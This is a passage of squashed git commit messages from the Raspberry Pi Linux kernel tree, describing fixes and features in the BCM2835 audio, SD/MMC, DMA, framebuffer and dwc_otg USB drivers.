Signed-off-by: Phil Elwell <phil@raspberrypi.org>
Signed-off-by: popcornmix <popcornmix@gmail.com>
alsa: add mmap support and some cleanups to bcm2835 ALSA driver
snd-bcm2835: Add support for spdif/hdmi passthrough
This adds a dedicated subdevice which can be used for passthrough of non-audio
formats (ie encoded a52) through the hdmi audio link. In addition to this
driver extension an appropriate card config is required to make alsa-lib
support the AES parameters for this device.
snd-bcm2708: Add mutex, improve logging
Fix for ALSA driver crash
Avoids an issue when closing and opening vchiq where a message can arrive before service handle has been written
alsa: reduce severity of expected warning message
snd-bcm2708: Fix dmesg spam for non-error case
alsa: Ensure mutexes are released through error paths
alsa: Make interrupted close paths quieter
BCM270x: Add onboard sound device to Device Tree
Add Device Tree support to alsa driver.
Add device to Device Tree.
Don't add platform devices when booting in DT mode.
Signed-off-by: Noralf Trønnes <noralf@tronnes.org>
bcm2835: access controls under the audio mutex
I don't think the ALSA framework provides any kind of automatic
synchronization within the control callbacks. We most likely need
to ensure this manually, so add locking around all access to shared
mutable data. In particular, bcm2835_audio_set_ctls() should
probably always be called under our own audio lock.
snd-bcm2835: Don't allow responses from VC to be interrupted by user signals
There should always be a response, and retry after a signal interruption is not handled, so don't report
we are interruptible.
See: https://github.com/raspberrypi/linux/issues/1560
snd-bcm2835: Use bcm2835_hw params in preallocate
Signed-off-by: popcornmix <popcornmix@gmail.com>
vc_cma: Make the vc_cma area the default contiguous DMA area
vc_cma: Provide empty functions when module is not built
Providing empty functions saves the users from guarding the
function call with an #if clause.
Move __init markings from prototypes to functions.
Signed-off-by: Noralf Trønnes <noralf@tronnes.org>
Some SD cards have been found that corrupt data when small blocks
are erased. Add a quirk to indicate that ERASE should not be used,
and set it for cards of that type.
Signed-off-by: Phil Elwell <phil@raspberrypi.org>
mmc: Apply QUIRK_BROKEN_ERASE to other capacities
Signed-off-by: Phil Elwell <phil@raspberrypi.org>
mmc: Add card_quirks module parameter, log quirks
Use mmc_block.card_quirks to override the quirks for all SD or MMC
cards. The value is a bitfield using the bit positions defined in
include/linux/mmc/card.h. If the module parameter is placed in the
kernel command line (or bootargs) stored on the card then, assuming the
device only has one SD card interface, the override effectively becomes
card-specific.
Signed-off-by: Phil Elwell <phil@raspberrypi.org>
BCM2835 has two SD card interfaces. This driver uses the other one.
bcm2835-sdhost: Error handling fix, and code clarification
bcm2835-sdhost: Adding overclocking option
Allow a different clock speed to be substitued for a requested 50MHz.
This option is exposed using the "overclock_50" DT parameter.
Note that the sdhost interface is restricted to integer divisions of
core_freq, and the highest sensible option for a core_freq of 250MHz
is 84 (250/3 = 83.3MHz), the next being 125 (250/2) which is much too
high.
Use at your own risk.
bcm2835-sdhost: Round up the overclock, so 62 works for 62.5Mhz
Also only warn once for each overclock setting.
bcm2835-sdhost: Improve error handling and recovery
1) Expose the hw_reset method to the MMC framework, removing many
internal calls by the driver.
2) Reduce overclock setting on error.
3) Increase timeout to cope with high capacity cards.
4) Add properties and parameters to control pio_limit and debug.
5) Reduce messages at probe time.
bcm2835-sdhost: Further improve overclock back-off
bcm2835-sdhost: Clear HBLC for PIO mode
Also update pio_limit default in overlay README.
bcm2835-sdhost: Add the ERASE capability
See: https://github.com/raspberrypi/linux/issues/1076
bcm2835-sdhost: Ignore CRC7 for MMC CMD1
It seems that the sdhost interface returns CRC7 errors for CMD1,
which is the MMC-specific SEND_OP_COND. Returning these errors to
the MMC layer causes a downward spiral, but ignoring them seems
to be harmless.
bcm2835-mmc/sdhost: Remove ARCH_BCM2835 differences
The bcm2835-mmc driver (and -sdhost driver that copied from it)
contains code to handle SDIO interrupts in a threaded interrupt
handler rather than waking the MMC framework thread. The change
follows a patch from Russell King that adds the facility as the
preferred way of working.
However, the new code path is only present in ARCH_BCM2835
builds, which I have taken to be a way of testing the waters
rather than making the change across the board; I can't see
any technical reason why it wouldn't be enabled for MACH_BCM270X
builds. So this patch standardises on the ARCH_BCM2835 code,
removing the old code paths.
bcm2835-sdhost: Don't log timeout errors unless debug=1
The MMC card-discovery process generates timeouts. This is
expected behaviour, so reporting it to the user serves no purpose.
Suppress the reporting of timeout errors unless the debug flag
is on.
bcm2835-sdhost: Add workaround for odd behaviour on some cards
For reasons not understood, the sdhost driver fails when reading
sectors very near the end of some SD cards. The problem could
be related to the similar issue that reading the final sector
of any card as part of a multiple read never completes, and the
workaround is an extension of the mechanism introduced to solve
that problem which ensures those sectors are always read singly.
bcm2835-sdhost: Major revision
This is a significant revision of the bcm2835-sdhost driver. It
improves on the original in a number of ways:
1) Through the use of CMD23 for reads it appears to avoid problems
reading some sectors on certain high speed cards.
2) Better atomicity to prevent crashes.
3) Higher performance.
4) Activity logging included, for easier diagnosis in the event
of a problem.
Signed-off-by: Phil Elwell <phil@raspberrypi.org>
bcm2835-sdhost: Restore ATOMIC flag to PIO sg mapping
Allocation problems have been seen in a wireless driver, and
this is the only change which might have been responsible.
SQUASH: bcm2835-sdhost: Only claim one DMA channel
With both MMC controllers enabled there are few DMA channels left. The
bcm2835-sdhost driver only uses DMA in one direction at a time, so it
doesn't need to claim two channels.
See: https://github.com/raspberrypi/linux/issues/1327
Signed-off-by: Phil Elwell <phil@raspberrypi.org>
bcm2835-sdhost: Workaround for "slow" sectors
Some cards have been seen to cause timeouts after certain sectors are
read. This workaround enforces a minimum delay between the stop after
reading one of those sectors and a subsequent data command.
Using CMD23 (SET_BLOCK_COUNT) avoids this problem, so good cards will
not be penalised by this workaround.
Signed-off-by: Phil Elwell <phil@raspberrypi.org>
bcm2835-sdhost: Firmware manages the clock divisor
The bcm2835-sdhost driver hands control of the CDIV clock divisor
register to matching firmware, allowing it to adjust to a changing
core clock. This removes the need to use the performance governor or
to enable io_is_busy on the on-demand governor in order to get the
best SD performance.
N.B. As SD clocks must be an integer divisor of the core clock, it is
possible that the SD clock for "turbo" mode can be different (even
lower) than "normal" mode.
Signed-off-by: Phil Elwell <phil@raspberrypi.org>
bcm2835-sdhost: Reset the clock in task context
Since reprogramming the clock can now involve a round-trip to the
firmware it must not be done at atomic context, and a tasklet
is not a task.
Signed-off-by: Phil Elwell <phil@raspberrypi.org>
bcm2835-sdhost: Don't exit cmd wait loop on error
The FAIL flag can be set in the CMD register before command processing
is complete, leading to spurious "failed to complete" errors. This has
the effect of promoting harmless CRC7 errors during CMD1 processing
into errors that can delay and even prevent booting.
Also:
1) Convert the last KERN_ERROR message in the register dumping to
KERN_INFO.
2) Remove an unnecessary reset call from bcm2835_sdhost_add_host.
See: https://github.com/raspberrypi/linux/pull/1492
Signed-off-by: Phil Elwell <phil@raspberrypi.org>
mmc: Disable CMD23 transfers on all cards
Pending wire-level investigation of these types of transfers
and associated errors on bcm2835-mmc, disable for now. Fallback of
CMD18/CMD25 transfers will be used automatically by the MMC layer.
Reported/Tested-by: Gellert Weisz <gellert@raspberrypi.org>
mmc: bcm2835-mmc: enable DT support for all architectures
Both ARCH_BCM2835 and ARCH_BCM270x are built with OF now.
Enable Device Tree support for all architectures.
Signed-off-by: Noralf Trønnes <noralf@tronnes.org>
mmc: bcm2835-mmc: fix probe error handling
Probe error handling is broken in several places.
Simplify error handling by using device managed functions.
Replace pr_{err,info} with dev_{err,info}.
Signed-off-by: Noralf Trønnes <noralf@tronnes.org>
bcm2835-mmc: Add locks when accessing sdhost registers
bcm2835-mmc: Add range of debug options for slowing things down
bcm2835-mmc: Add option to disable some delays
bcm2835-mmc: Add option to disable MMC_QUIRK_BLK_NO_CMD23
bcm2835-mmc: Default to disabling MMC_QUIRK_BLK_NO_CMD23
bcm2835-mmc: Adding overclocking option
Allow a different clock speed to be substitued for a requested 50MHz.
This option is exposed using the "overclock_50" DT parameter.
Note that the mmc interface is restricted to EVEN integer divisions of
250MHz, and the highest sensible option is 63 (250/4 = 62.5), the
next being 125 (250/2) which is much too high.
Use at your own risk.
bcm2835-mmc: Round up the overclock, so 62 works for 62.5Mhz
Also only warn once for each overclock setting.
mmc: bcm2835-mmc: Make available on ARCH_BCM2835
Make the bcm2835-mmc driver available for use on ARCH_BCM2835.
Signed-off-by: Noralf Trønnes <noralf@tronnes.org>
BCM270x_DT: add bcm2835-mmc entry
Add Device Tree entry for bcm2835-mmc.
In non-DT mode, don't add the device in the board file.
Signed-off-by: Noralf Trønnes <noralf@tronnes.org>
bcm2835-mmc: Don't overwrite MMC capabilities from DT
bcm2835-mmc: Don't override bus width capabilities from devicetree
Take out the force setting of the MMC_CAP_4_BIT_DATA host capability
so that the result read from devicetree via mmc_of_parse() is
preserved.
bcm2835-mmc: Only claim one DMA channel
With both MMC controllers enabled there are few DMA channels left. The
bcm2835-mmc driver only uses DMA in one direction at a time, so it
doesn't need to claim two channels.
See: https://github.com/raspberrypi/linux/issues/1327
Signed-off-by: Phil Elwell <phil@raspberrypi.org>
Add support for DMA controller of BCM2708 as used in the Raspberry Pi.
Currently it only supports cyclic DMA.
Signed-off-by: Florian Meier <florian.meier@koalo.de>
dmaengine: expand functionality by supporting scatter/gather transfers sdhci-bcm2708 and dma.c: fix for LITE channels
DMA: fix cyclic LITE length overflow bug
dmaengine: bcm2708: Remove chancnt affectations
Mirror bcm2835-dma.c commit 9eba5536a7:
chancnt is already filled by dma_async_device_register, which uses the channel
list to know how much channels there is.
Since it's already filled, we can safely remove it from the drivers' probe
function.
Signed-off-by: Noralf Trønnes <noralf@tronnes.org>
dmaengine: bcm2708: overwrite dreq only if it is not set
dreq is set when the DMA channel is fetched from Device Tree.
slave_id is set using dmaengine_slave_config().
Only overwrite dreq with slave_id if it is not set.
dreq/slave_id in the cyclic DMA case is not touched, because I don't
have hardware to test with.
Signed-off-by: Noralf Trønnes <noralf@tronnes.org>
dmaengine: bcm2708: do device registration in the board file
Don't register the device in the driver. Do it in the board file.
Signed-off-by: Noralf Trønnes <noralf@tronnes.org>
dmaengine: bcm2708: don't restrict DT support to ARCH_BCM2835
Both ARCH_BCM2835 and ARCH_BCM270x are built with OF now.
Add Device Tree support to the non ARCH_BCM2835 case.
Use the same driver name regardless of architecture.
Signed-off-by: Noralf Trønnes <noralf@tronnes.org>
BCM270x_DT: add bcm2835-dma entry
Add Device Tree entry for bcm2835-dma.
The entry doesn't contain any resources since they are handled
by the arch/arm/mach-bcm270x/dma.c driver.
In non-DT mode, don't add the device in the board file.
Signed-off-by: Noralf Trønnes <noralf@tronnes.org>
bcm2708-dmaengine: Add debug options
BCM270x: Add memory and irq resources to dmaengine device and DT
Prepare for merging of the legacy DMA API arch driver dma.c
with bcm2708-dmaengine by adding memory and irq resources both
to platform file device and Device Tree node.
Don't use BCM_DMAMAN_DRIVER_NAME so we don't have to include mach/dma.h
Signed-off-by: Noralf Trønnes <noralf@tronnes.org>
dmaengine: bcm2708: Merge with arch dma.c driver and disable dma.c
Merge the legacy DMA API driver with bcm2708-dmaengine.
This is done so we can use bcm2708_fb on ARCH_BCM2835 (mailbox
driver is also needed).
Changes to the dma.c code:
- Use BIT() macro.
- Cutdown some comments to one line.
- Add mutex to vc_dmaman and use this, since the dev lock is locked
during probing of the engine part.
- Add global g_dmaman variable since drvdata is used by the engine part.
- Restructure for readability:
vc_dmaman_chan_alloc()
vc_dmaman_chan_free()
bcm_dma_chan_free()
- Restructure bcm_dma_chan_alloc() to simplify error handling.
- Use device irq resources instead of hardcoded bcm_dma_irqs table.
- Remove dev_dmaman_register() and code it directly.
- Remove dev_dmaman_deregister() and code it directly.
- Simplify bcm_dmaman_probe() using devm_* functions.
- Get dmachans from DT if available.
- Keep 'dma.dmachans' module argument name for backwards compatibility.
Make it available on ARCH_BCM2835 as well.
Signed-off-by: Noralf Trønnes <noralf@tronnes.org>
dmaengine: bcm2708: set residue_granularity field
bcm2708-dmaengine supports residue reporting at burst level
but didn't report this via the residue_granularity field.
Without this field set properly we get playback issues with I2S cards.
dmaengine: bcm2708-dmaengine: Fix memory leak when stopping a running transfer
bcm2708-dmaengine: Use more DMA channels (but not 12)
1) Only the bcm2708_fb drivers uses the legacy DMA API, and
it requires a BULK-capable channel, so all other types
(FAST, NORMAL and LITE) can be made available to the regular
DMA API.
2) DMA channels 11-14 share an interrupt. The driver can't
handle this, so don't use channels 12-14 (12 was used, probably
because it appears to have an interrupt, but in reality that
interrupt is for activity on ANY channel). This may explain
a lockup encountered when running out of DMA channels.
The combined effect of this patch is to leave 7 DMA channels
available + channel 0 for bcm2708_fb via the legacy API.
See: https://github.com/raspberrypi/linux/issues/1110https://github.com/raspberrypi/linux/issues/1108
dmaengine: bcm2708: Make legacy API available for bcm2835-dma
bcm2708_fb uses the legacy DMA API, so in order to start using
bcm2835-dma, bcm2835-dma has to support the legacy API. Make this
possible by exporting bcm_dmaman_probe() and bcm_dmaman_remove().
Signed-off-by: Noralf Trønnes <noralf@tronnes.org>
dmaengine: bcm2708: Change DT compatible string
Both bcm2835-dma and bcm2708-dmaengine have the same compatible string.
So change compatible to "brcm,bcm2708-dma".
Signed-off-by: Noralf Trønnes <noralf@tronnes.org>
dmaengine: bcm2708: Remove driver but keep legacy API
Dropping non-DT support means we don't need this driver,
but we still need the legacy DMA API.
Signed-off-by: Noralf Trønnes <noralf@tronnes.org>
bcm2708-dmaengine - Fix arm64 portability/build issues
Signed-off-by: popcornmix <popcornmix@gmail.com>
bcm2708_fb : Implement blanking support using the mailbox property interface
bcm2708_fb: Add pan and vsync controls
bcm2708_fb: DMA acceleration for fb_copyarea
Based on http://www.raspberrypi.org/phpBB3/viewtopic.php?p=62425#p62425
Also used Simon's dmaer_master module as a reference for tweaking DMA
settings for better performance.
For now busylooping only. IRQ support might be added later.
With non-overclocked Raspberry Pi, the performance is ~360 MB/s
for simple copy or ~260 MB/s for two-pass copy (used when dragging
windows to the right).
In the case of using DMA channel 0, the performance improves
to ~440 MB/s.
For comparison, VFP optimized CPU copy can only do ~114 MB/s in
the same conditions (hindered by reading uncached source buffer).
Signed-off-by: Siarhei Siamashka <siarhei.siamashka@gmail.com>
bcm2708_fb: report number of dma copies
Add a counter (exported via debugfs) reporting the
number of dma copies that the framebuffer driver
has done, in order to help evaluate different
optimization strategies.
Signed-off-by: Luke Diamand <luked@broadcom.com>
bcm2708_fb: use IRQ for DMA copies
The copyarea ioctl() uses DMA to speed things along. This
was busy-waiting for completion. This change supports using
an interrupt instead for larger transfers. For small
transfers, busy-waiting is still likely to be faster.
Signed-off-by: Luke Diamand <luke@diamand.org>
bcm2708: Make ioctl logging quieter
video: fbdev: bcm2708_fb: Don't panic on error
No need to panic the kernel if the video driver fails.
Just print a message and return an error.
Signed-off-by: Noralf Trønnes <noralf@tronnes.org>
fbdev: bcm2708_fb: Add ARCH_BCM2835 support
Add Device Tree support.
Pass the device to dma_alloc_coherent() in order to get the
correct bus address on ARCH_BCM2835.
Use the new DMA legacy API header file.
Including <mach/platform.h> is not necessary.
Signed-off-by: Noralf Trønnes <noralf@tronnes.org>
BCM270x_DT: Add bcm2708-fb device
Add bcm2708-fb to Device Tree and don't add the
platform device when booting in DT mode.
Signed-off-by: Noralf Trønnes <noralf@tronnes.org>
Signed-off-by: popcornmix <popcornmix@gmail.com>
usb: dwc: fix lockdep false positive
Signed-off-by: Kari Suvanto <karis79@gmail.com>
usb: dwc: fix inconsistent lock state
Signed-off-by: Kari Suvanto <karis79@gmail.com>
Add FIQ patch to dwc_otg driver. Enable with dwc_otg.fiq_fix_enable=1. Should give about 10% more ARM performance.
Thanks to Gordon and Costas
Avoid dynamic memory allocation for channel lock in USB driver. Thanks ddv2005.
Add NAK holdoff scheme. Enabled by default, disable with dwc_otg.nak_holdoff_enable=0. Thanks gsh
Make sure we wait for the reset to finish
dwc_otg: fix bug in dwc_otg_hcd.c resulting in silent kernel
memory corruption, escalating to OOPS under high USB load.
dwc_otg: Fix unsafe access of QTD during URB enqueue
In dwc_otg_hcd_urb_enqueue during qtd creation, it was possible that the
transaction could complete almost immediately after the qtd was assigned
to a host channel during URB enqueue, which meant the qtd pointer was no
longer valid having been completed and removed. Usually, this resulted in
an OOPS during URB submission. By predetermining whether transactions
need to be queued or not, this unsafe pointer access is avoided.
This bug was only evident on the Pi model A where a device was attached
that had no periodic endpoints (e.g. USB pendrive or some wlan devices).
dwc_otg: Fix incorrect URB allocation error handling
If the memory allocation for a dwc_otg_urb failed, the kernel would OOPS
because for some reason a member of the *unallocated* struct was set to
zero. Error handling changed to fail correctly.
dwc_otg: fix potential use-after-free case in interrupt handler
If a transaction had previously aborted, certain interrupts are
enabled to track error counts and reset where necessary. On IN
endpoints the host generates an ACK interrupt near-simultaneously
with completion of transfer. In the case where this transfer had
previously had an error, this results in a use-after-free on
the QTD memory space with a 1-byte length being overwritten to
0x00.
dwc_otg: add handling of SPLIT transaction data toggle errors
Previously a data toggle error on packets from a USB1.1 device behind
a TT would result in the Pi locking up as the driver never handled
the associated interrupt. Patch adds basic retry mechanism and
interrupt acknowledgement to cater for either a chance toggle error or
for devices that have a broken initial toggle state (FT8U232/FT232BM).
dwc_otg: implement tasklet for returning URBs to usbcore hcd layer
The dwc_otg driver interrupt handler for transfer completion will spend
a very long time with interrupts disabled when a URB is completed -
this is because usb_hcd_giveback_urb is called from within the handler
which for a USB device driver with complicated processing (e.g. webcam)
will take an exorbitant amount of time to complete. This results in
missed completion interrupts for other USB packets which lead to them
being dropped due to microframe overruns.
This patch splits returning the URB to the usb hcd layer into a
high-priority tasklet. This will have most benefit for isochronous IN
transfers but will also have incidental benefit where multiple periodic
devices are active at once.
dwc_otg: fix NAK holdoff and allow on split transactions only
This corrects a bug where if a single active non-periodic endpoint
had at least one transaction in its qh, on frnum == MAX_FRNUM the qh
would get skipped and never get queued again. This would result in
a silent device until error detection (automatic or otherwise) would
either reset the device or flush and requeue the URBs.
Additionally the NAK holdoff was enabled for all transactions - this
would potentially stall a HS endpoint for 1ms if a previous error state
enabled this interrupt and the next response was a NAK. Fix so that
only split transactions get held off.
dwc_otg: Call usb_hcd_unlink_urb_from_ep with lock held in completion handler
usb_hcd_unlink_urb_from_ep must be called with the HCD lock held. Calling it
asynchronously in the tasklet was not safe (regression in
c4564d4a1a).
This change unlinks it from the endpoint prior to queueing it for handling in
the tasklet, and also adds a check to ensure the urb is OK to be unlinked
before doing so.
NULL pointer dereference kernel oopses had been observed in usb_hcd_giveback_urb
when a USB device was unplugged/replugged during data transfer. This effect
was reproduced using automated USB port power control, hundreds of replug
events were performed during active transfers to confirm that the problem was
eliminated.
USB fix using a FIQ to implement split transactions
This commit adds a FIQ implementaion that schedules
the split transactions using a FIQ so we don't get
held off by the interrupt latency of Linux
dwc_otg: fix device attributes and avoid kernel warnings on boot
dcw_otg: avoid logging function that can cause panics
See: https://github.com/raspberrypi/firmware/issues/21
Thanks to cleverca22 for fix
dwc_otg: mask correct interrupts after transaction error recovery
The dwc_otg driver will unmask certain interrupts on a transaction
that previously halted in the error state in order to reset the
QTD error count. The various fine-grained interrupt handlers do not
consider that other interrupts besides themselves were unmasked.
By disabling the two other interrupts only ever enabled in DMA mode
for this purpose, we can avoid unnecessary function calls in the
IRQ handler. This will also prevent an unneccesary FIQ interrupt
from being generated if the FIQ is enabled.
dwc_otg: fiq: prevent FIQ thrash and incorrect state passing to IRQ
In the case of a transaction to a device that had previously aborted
due to an error, several interrupts are enabled to reset the error
count when a device responds. This has the side-effect of making the
FIQ thrash because the hardware will generate multiple instances of
a NAK on an IN bulk/interrupt endpoint and multiple instances of ACK
on an OUT bulk/interrupt endpoint. Make the FIQ mask and clear the
associated interrupts.
Additionally, on non-split transactions make sure that only unmasked
interrupts are cleared. This caused a hard-to-trigger but serious
race condition when you had the combination of an endpoint awaiting
error recovery and a transaction completed on an endpoint - due to
the sequencing and timing of interrupts generated by the dwc_otg core,
it was possible to confuse the IRQ handler.
Fix function tracing
dwc_otg: whitespace cleanup in dwc_otg_urb_enqueue
dwc_otg: prevent OOPSes during device disconnects
The dwc_otg_urb_enqueue function is thread-unsafe. In particular the
access of urb->hcpriv, usb_hcd_link_urb_to_ep, dwc_otg_urb->qtd and
friends does not occur within a critical section and so if a device
was unplugged during activity there was a high chance that the
usbcore hub_thread would try to disable the endpoint with partially-
formed entries in the URB queue. This would result in BUG() or null
pointer dereferences.
Fix so that access of urb->hcpriv, enqueuing to the hardware and
adding to usbcore endpoint URB lists is contained within a single
critical section.
dwc_otg: prevent BUG() in TT allocation if hub address is > 16
A fixed-size array is used to track TT allocation. This was
previously set to 16 which caused a crash because
dwc_otg_hcd_allocate_port would read past the end of the array.
This was hit if a hub was plugged in which enumerated as addr > 16,
due to previous device resets or unplugs.
Also add #ifdef FIQ_DEBUG around hcd->hub_port_alloc[], which grows
to a large size if 128 hub addresses are supported. This field is
for debug only for tracking which frame an allocate happened in.
dwc_otg: make channel halts with unknown state less damaging
If the IRQ received a channel halt interrupt through the FIQ
with no other bits set, the IRQ would not release the host
channel and never complete the URB.
Add catchall handling to treat as a transaction error and retry.
dwc_otg: fiq_split: use TTs with more granularity
This fixes certain issues with split transaction scheduling.
- Isochronous multi-packet OUT transactions now hog the TT until
they are completed - this prevents hubs aborting transactions
if they get a periodic start-split out-of-order
- Don't perform TT allocation on non-periodic endpoints - this
allows simultaneous use of the TT's bulk/control and periodic
transaction buffers
This commit will mainly affect USB audio playback.
dwc_otg: fix potential sleep while atomic during urb enqueue
Fixes a regression introduced with eb1b482a. Kmalloc called from
dwc_otg_hcd_qtd_add / dwc_otg_hcd_qtd_create did not always have
the GPF_ATOMIC flag set. Force this flag when inside the larger
critical section.
dwc_otg: make fiq_split_enable imply fiq_fix_enable
Failing to set up the FIQ correctly would result in
"IRQ 32: nobody cared" errors in dmesg.
dwc_otg: prevent crashes on host port disconnects
Fix several issues resulting in crashes or inconsistent state
if a Model A root port was disconnected.
- Clean up queue heads properly in kill_urbs_in_qh_list by
removing the empty QHs from the schedule lists
- Set the halt status properly to prevent IRQ handlers from
using freed memory
- Add fiq_split related cleanup for saved registers
- Make microframe scheduling reclaim host channels if
active during a disconnect
- Abort URBs with -ESHUTDOWN status response, informing
device drivers so they respond in a more correct fashion
and don't try to resubmit URBs
- Prevent IRQ handlers from attempting to handle channel
interrupts if the associated URB was dequeued (and the
driver state was cleared)
dwc_otg: prevent leaking URBs during enqueue
A dwc_otg_urb would get leaked if the HCD enqueue function
failed for any reason. Free the URB at the appropriate points.
dwc_otg: Enable NAK holdoff for control split transactions
Certain low-speed devices take a very long time to complete a
data or status stage of a control transaction, producing NAK
responses until they complete internal processing - the USB2.0
spec limit is up to 500mS. This causes the same type of interrupt
storm as seen with USB-serial dongles prior to c8edb238.
In certain circumstances, usually while booting, this interrupt
storm could cause SD card timeouts.
dwc_otg: Fix for occasional lockup on boot when doing a USB reset
dwc_otg: Don't issue traffic to LS devices in FS mode
Issuing low-speed packets when the root port is in full-speed mode
causes the root port to stop responding. Explicitly fail when
enqueuing URBs to a LS endpoint on a FS bus.
Fix ARM architecture issue with local_irq_restore()
If local_fiq_enable() is called before a local_irq_restore(flags) where
the flags variable has the F bit set, the FIQ will be erroneously disabled.
Fixup arch_local_irq_restore to avoid trampling the F bit in CPSR.
Also fix some of the hacks previously implemented for previous dwc_otg
incarnations.
dwc_otg: fiq_fsm: Base commit for driver rewrite
This commit removes the previous FIQ fixes entirely and adds fiq_fsm.
This rewrite features much more complete support for split transactions
and takes into account several OTG hardware bugs. High-speed
isochronous transactions are also capable of being performed by fiq_fsm.
All driver options have been removed and replaced with:
- dwc_otg.fiq_enable (bool)
- dwc_otg.fiq_fsm_enable (bool)
- dwc_otg.fiq_fsm_mask (bitmask)
- dwc_otg.nak_holdoff (unsigned int)
Defaults are specified such that fiq_fsm behaves similarly to the
previously implemented FIQ fixes.
fiq_fsm: Push error recovery into the FIQ when fiq_fsm is used
If the transfer associated with a QTD failed due to a bus error, the HCD
would retry the transfer up to 3 times (implementing the USB2.0
three-strikes retry in software).
Due to the masking mechanism used by fiq_fsm, it is only possible to pass
a single interrupt through to the HCD per-transfer.
In this instance host channels would fall off the radar because the error
reset would function, but the subsequent channel halt would be lost.
Push the error count reset into the FIQ handler.
fiq_fsm: Implement timeout mechanism
For full-speed endpoints with a large packet size, interrupt latency
runs the risk of the FIQ starting a transaction too late in a full-speed
frame. If the device is still transmitting data when EOF2 for the
downstream frame occurs, the hub will disable the port. This change is
not reflected in the hub status endpoint and the device becomes
unresponsive.
Prevent high-bandwidth transactions from being started too late in a
frame. The mechanism is not guaranteed: a combination of bit stuffing
and hub latency may still result in a device overrunning.
fiq_fsm: fix bounce buffer utilisation for Isochronous OUT
Multi-packet isochronous OUT transactions were subject to a few bounday
bugs. Fix them.
Audio playback is now much more robust: however, an issue stands with
devices that have adaptive sinks - ALSA plays samples too fast.
dwc_otg: Return full-speed frame numbers in HS mode
The frame counter increments on every *microframe* in high-speed mode.
Most device drivers expect this number to be in full-speed frames - this
caused considerable confusion to e.g. snd_usb_audio which uses the
frame counter to estimate the number of samples played.
fiq_fsm: save PID on completion of interrupt OUT transfers
Also add edge case handling for interrupt transports.
Note that for periodic split IN, data toggles are unimplemented in the
OTG host hardware - it unconditionally accepts any PID.
fiq_fsm: add missing case for fiq_fsm_tt_in_use()
Certain combinations of bitrate and endpoint activity could
result in a periodic transaction erroneously getting started
while the previous Isochronous OUT was still active.
fiq_fsm: clear hcintmsk for aborted transactions
Prevents the FIQ from erroneously handling interrupts
on a timed out channel.
fiq_fsm: enable by default
fiq_fsm: fix dequeues for non-periodic split transactions
If a dequeue happened between the SSPLIT and CSPLIT phases of the
transaction, the HCD would never receive an interrupt.
fiq_fsm: Disable by default
fiq_fsm: Handle HC babble errors
The HCTSIZ transfer size field raises a babble interrupt if
the counter wraps. Handle the resulting interrupt in this case.
dwc_otg: fix interrupt registration for fiq_enable=0
Additionally make the module parameter conditional for wherever
hcd->fiq_state is touched.
fiq_fsm: Enable by default
dwc_otg: Fix various issues with root port and transaction errors
Process the host port interrupts correctly (and don't trample them).
Root port hotplug now functional again.
Fix a few thinkos with the transaction error passthrough for fiq_fsm.
fiq_fsm: Implement hack for Split Interrupt transactions
Hubs aren't too picky about which endpoint we send Control type split
transactions to. By treating Interrupt transfers as Control, it is
possible to use the non-periodic queue in the OTG core as well as the
non-periodic FIFOs in the hub itself. This massively reduces the
microframe exclusivity/contention that periodic split transactions
otherwise have to enforce.
It goes without saying that this is a fairly egregious USB specification
violation, but it works.
Original idea by Hans Petter Selasky @ FreeBSD.org.
dwc_otg: FIQ support on SMP. Set up FIQ stack and handler on Core 0 only.
dwc_otg: introduce fiq_fsm_spin(un|)lock()
SMP safety for the FIQ relies on register read-modify write cycles being
completed in the correct order. Several places in the DWC code modify
registers also touched by the FIQ. Protect these by a bare-bones lock
mechanism.
This also makes it possible to run the FIQ and IRQ handlers on different
cores.
fiq_fsm: fix build on bcm2708 and bcm2709 platforms
dwc_otg: put some barriers back where they should be for UP
bcm2709/dwc_otg: Setup FIQ on core 1 if >1 core active
dwc_otg: fixup read-modify-write in critical paths
Be more careful about read-modify-write on registers that the FIQ
also touches.
Guard fiq_fsm_spin_lock with fiq_enable check
fiq_fsm: Falling out of the state machine isn't fatal
This edge case can be hit if the port is disabled while the FIQ is
in the middle of a transaction. Make the effects less severe.
Also get rid of the useless return value.
squash: dwc_otg: Allow to build without SMP
usb: core: make overcurrent messages more prominent
Hub overcurrent messages are more serious than "debug". Increase loglevel.
usb: dwc_otg: Don't use dma_to_virt()
Commit 6ce0d20 changes dma_to_virt() which breaks this driver.
Open code the old dma_to_virt() implementation to work around this.
Limit the use of __bus_to_virt() to cases where transfer_buffer_length
is set and transfer_buffer is not set. This is done to increase the
chance that this driver will also work on ARCH_BCM2835.
transfer_buffer should not be NULL if the length is set, but the
comment in the code indicates that there are situations where this
might happen. drivers/usb/isp1760/isp1760-hcd.c also has a similar
comment pointing to a possible: 'usb storage / SCSI bug'.
Signed-off-by: Noralf Trønnes <noralf@tronnes.org>
dwc_otg: Fix crash when fiq_enable=0
dwc_otg: fiq_fsm: Make high-speed isochronous strided transfers work properly
Certain low-bandwidth high-speed USB devices (specialist audio devices,
compressed-frame webcams) have packet intervals > 1 microframe.
Stride these transfers in the FIQ by using the start-of-frame interrupt
to restart the channel at the right time.
dwc_otg: Force host mode to fix incorrect compute module boards
dwc_otg: Add ARCH_BCM2835 support
Signed-off-by: Noralf Trønnes <noralf@tronnes.org>
dwc_otg: Simplify FIQ irq number code
Dropping ATAGS means we can simplify the FIQ irq number code.
Also add error checking on the returned irq number.
Signed-off-by: Noralf Trønnes <noralf@tronnes.org>
dwc_otg: Remove duplicate gadget probe/unregister function
dwc_otg: Properly set the HFIR
Douglas Anderson reported:
According to the most up to date version of the dwc2 databook, the FRINT
field of the HFIR register should be programmed to:
* 125 us * (PHY clock freq for HS) - 1
* 1000 us * (PHY clock freq for FS/LS) - 1
This is opposed to older versions of the doc that claimed it should be:
* 125 us * (PHY clock freq for HS)
* 1000 us * (PHY clock freq for FS/LS)
and reported lower timing jitter on a USB analyser
dcw_otg: trim xfer length when buffer larger than allocated size is received
dwc_otg: Don't free qh align buffers in atomic context
dwc_otg: Enable the hack for Split Interrupt transactions by default
dwc_otg.fiq_fsm_mask=0xF has long been a suggestion for users with audio stutters or other USB bandwidth issues.
So far we are aware of many success stories but no failure caused by this setting.
Make it a default to learn more.
See: https://www.raspberrypi.org/forums/viewtopic.php?f=28&t=70437
Signed-off-by: popcornmix <popcornmix@gmail.com>
dwc_otg: Use kzalloc when suitable
While the SDRAM is being driven by its dedicated PLL most of the time,
there is a little loop running in the firmware that periodically turns
on the CM SDRAM clock (using its pre-initialized parent) and switches
SDRAM to using the CM clock to do PVT recalibration.
This avoids system hangs if we choose SDRAM's parent for some other
clock, then disable that clock.
Signed-off-by: Eric Anholt <eric@anholt.net>
These divide off of PLLD_PER and are used for the ethernet and wifi
